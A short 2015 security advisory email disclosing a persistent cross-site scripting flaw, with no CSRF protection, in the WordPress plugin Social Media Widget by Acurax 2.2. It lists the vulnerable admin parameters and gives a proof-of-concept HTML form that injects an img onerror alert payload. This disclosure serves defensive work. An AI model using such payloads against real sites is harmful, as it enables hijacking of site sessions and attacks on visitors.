Subject: Persistent Cross-Site Scripting (XSS) in Social Media Widget by Acurax 2.2
Date: Fri, 21 Aug 2015 11:49:09 +0200

Hello,

Plugin: Social Media Widget by Acurax 2.2 https://wordpress.org/plugins/acurax-social-media-widget/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=Acurax-Social-Widget-Settings
Vulnerable parameters: acx_widget_si_theme, acx_widget_si_twitter, acx_widget_si_facebook, acx_widget_si_youtube, acx_widget_si_linkedin, acx_widget_si_gplus, acx_widget_si_credit, acx_widget_si_icon_size, acx_widget_si_pinterest, acx_widget_si_feed

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=Acurax-Social-Widget-Settings" />
<input type="text" name="acurax_social_widget_icon_hidden" value='Y' />
<input type="text" name="acx_widget_si_theme" value='"><img src=x onerror=alert(1) />'>
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,